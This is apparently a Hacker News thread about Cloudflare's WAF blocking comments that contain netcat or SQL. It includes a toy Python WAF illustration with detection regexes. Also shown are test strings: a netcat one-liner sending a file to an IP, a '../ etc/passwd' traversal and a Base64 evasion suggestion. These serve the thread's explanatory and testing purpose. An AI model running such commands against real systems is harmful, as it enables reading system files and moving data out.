Ask HN: Does Cloudflare block HN comments if you have code blocks in a reply?

source link: https://news.ycombinator.com/item?id=38986187

136 points by zikduruqe 7 hours ago | 49 comments
I was going to make a comment about using netcat to send files, and Cloudflare blocks the submission. I have never seen this happen to me on HN.

https://imgur.com/a/Pyhcssl

Has anyone run into this before?

Any code including netcat (for its tendency to be used in reverse shells) or SQL (for its tendency to be used in SQL injections) tends to be blocked across the entire cloudflare-net these days.
I see it. It explains why cloudflare is involved at all. But I don't see how this is related to the comment you replied to, which is saying that the text filter is ridiculous.
AFAIK most of these filters are disabled by default when setting up your website on Cloudflare, so most websites using the Cloudflare network likely have this turned off.
This is correct, it’s part of their WAF offering where there is rule-based blocking of content.
Interesting. That's the first time I have run across this. Makes sense.
That does not make sense at all; it is batshit-crazy broken.
Welcome to the world of WAFs. Pattern matching scary strings is big business.
Believe me you can find them present in popular sites you use everyday ;-) I caught one of them and reported it.
what dark magic is this? do you put it in front of all POSTs or something?
Not just POSTs, but any HTTP request - headers & query strings get inspected too.
I think they meant "corresponds with behavior observed" not "sounds rational."
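As an added illustration (not code from this thread, from HN or from Cloudflare), a toy signature engine with hypothetical rule ids shows why the netcat one-liner posted in the thread trips a generic pattern rule, that query strings and headers are inspected as well as POST bodies, and how per-endpoint, per-field tuning of the kind the thread mentions narrows a rule instead of switching the whole filter off:

```python
import re
from dataclasses import dataclass, field

# Toy rule set in the spirit of the signatures the thread describes.
# Rule ids and patterns are hypothetical, not Cloudflare's actual rules.
RULES = [
    ("RCE-NC", re.compile(r"(^|[\s|;&])nc\s+\S", re.I)),           # netcat invocation
    ("LFI-TRAVERSAL", re.compile(r"(\.\./){2,}")),                   # repeated ../ sequences
    ("SQLI-UNION", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
]

@dataclass
class Request:
    method: str
    path: str
    query: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)

def surfaces(req):
    """Every inspected (location, value) pair: not just the POST body."""
    for k, v in req.query.items():
        yield f"query:{k}", v
    for k, v in req.headers.items():
        yield f"header:{k}", v
    for k, v in req.form.items():
        yield f"form:{k}", v

def inspect(req, exclusions=None):
    """Return (rule_id, location) hits. `exclusions` maps a path to a dict of
    location -> set of rule ids that are NOT applied there (rule tuning)."""
    excluded = (exclusions or {}).get(req.path, {})
    hits = []
    for loc, value in surfaces(req):
        skip = excluded.get(loc, set())
        for rule_id, rx in RULES:
            if rule_id not in skip and rx.search(value):
                hits.append((rule_id, loc))
    return hits

# Constructed sample input: the comment from the thread, submitted as a form field,
# and the same text placed in a search query string.
COMMENT = "Dear cloudflare, please banhammer me\n    cat testfile.txt | nc 192.168.2.100 1234"
post_comment = Request("POST", "/comment", form={"text": COMMENT},
                       headers={"User-Agent": "Mozilla/5.0"})
search = Request("GET", "/search", query={"q": "cat testfile.txt | nc 192.168.2.100 1234"})

# Tuning: the free-text body of the comment endpoint is expected to contain code,
# so the signatures are not applied to that one field; everything else is still inspected.
TUNING = {"/comment": {"form:text": {"RCE-NC", "LFI-TRAVERSAL", "SQLI-UNION"}}}
```

With the default (untuned) rules `inspect(post_comment)` reports the netcat hit in the comment body; with `TUNING` the same comment passes, while the identical string in `search`'s query parameter is still flagged.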
So HN uses Cloudflare? That surprises me because typically I notice sites using Cloudflare because my mobile running GNU Linux cannot pass their dreaded Turnstile. Luckily that does not happen for HN.
The aggressiveness of the "dreaded Turnstile" is 100% configurable.

It's very easy to disable it completely via Cloudflare settings. Using cloudflare doesn't require you to use all of its features, and almost every feature can be turned off.

They used to run it but stopped (I want to say) around 2016 or 2017. Another poster here linked[0] to how dang confirmed it is to protect against a DDOS attack.

0: https://news.ycombinator.com/item?id=38939668

I meant to imply that Dang only re-added CF recently due to the attacks. They haven't used CF in many years to my knowledge.
Bummer. I used to like the legend that it was all on one commodity linux pc implemented in some nice concise lisp running on sbcl.
To get a fast answer, it's better to send an email to the mods [email protected]
I ran into this when trying to post a comment with
  ../ ../ ../ etc/ passwd

(remove the spaces)
What if you Base64 encode this? Pretty trivial to add to the form logic.
Yeah, I'd expect dang to just jump right on that. Just because you feel it is trivial does not mean that it should be done.
Probably not related, but I've been getting lots of throttling-like huge page load delays on HN the last couple days, only when logged in.

Any idea whether that's just an overloaded application server, or something Cloudflare is doing?

That's often the case with HN I think from past experience when there are large threads on HN, and dang has in the past said that's due to the application server.
Huh. Just tried submitting the same comment with the same result.

Minimal test, if I try to edit this post removing the asterisk, I get the "banned" page

  nc* 192.168.2.100
Cloudflare has access to everyone's cleartext? I was unaware of this. NSA must love that
Same for Akamai, Cloudfront, Fastly, etc. Pretty much every business that wants to offload DDOS protection, caching, and some level of frontline security uses a proxying CDN.

An alternative is to keep all of your CDN assets on a CDN bucket on its own hostname, with your main secret-containing business apps on your own servers, but it costs a lot to manage this level of separation and the payoff is only protection against the theoretical attack of "NSA can't attack our users/spy on them". If the NSA ever did do this on a large enough scale or to target a particularly notable person, it's very unlikely it would be kept a secret for long, and the end-business that used Cloudflare et al. wouldn't be implicated whatsoever since every business uses one of the big CDN providers.

They kept the other spying secret for a long time and it was only due to pretty heroic actions by one person that it got exposed. So I dunno.
That makes using https instead of http a lot less relevant.
https is important for preventing spying by anyone else in between you and the server. ISPs, coffee shop owners, schools, etc used to spy on http traffic to see what people were doing/searching for, and ISPs like xFinity injected code into non-https pages to show "important messages" to users, e.g. going over your bandwidth limit[0].

The only weak link now is Cloudflare, which is still "less secure than a direct connection" (with respect to government spying, bugs[1], hackers, etc) but the threat level is drastically reduced.

0: https://blog.ryankearney.com/2013/01/comcast-caught-intercep...

1: https://news.ycombinator.com/item?id=13766339

Is it possible to trigger a warning when the encrypted content I send to a site is provided to Cloudflare?
Hardly! Nobody is forcing you to consent to MITM, you freely choose it every time you voluntarily use a website that utilizes one.
It’s a CDN that caches content and it’s able to inject “are you human?” verification pages, it can rewrite content on demand (e.g. serve optimized images / html / JavaScript). It seems obvious to me that they have access and ability to modify all cleartext content in-flight.
It's a TLS termination proxy that decrypts and re-encrypts your TLS packets. Technically Cloudflare can read anything unless you add your own crypto layer on top of TLS.
I'm pretty sure the default is they can see all the cleartext, since their product is based on TLS interception, for example to evaluate page rules.

This is also how they insert extra headers in both the request and response.

Yes, that's how Cloudflare works. The TLS certificate for basically any website using Cloudflare "ends" at Cloudflare's servers. It's then either forwarded on to the actual servers in cleartext or re-encrypted with an internal company certificate (maybe signed internally as well) to pass the connection on to the actual servers. It was the easy way many companies who didn't have the expertise to do their own certificate management moved from the http world to the https world. They just handed it off to cloudflare and kept their servers running http.

F5 Networks, my former employer, sells something similar, but it's a box (or virtual appliance) you put in your own data centers somewhere that dead-ends the connection instead.

Dear cloudflare, please banhammer me
    cat testfile.txt | nc 192.168.2.100 1234
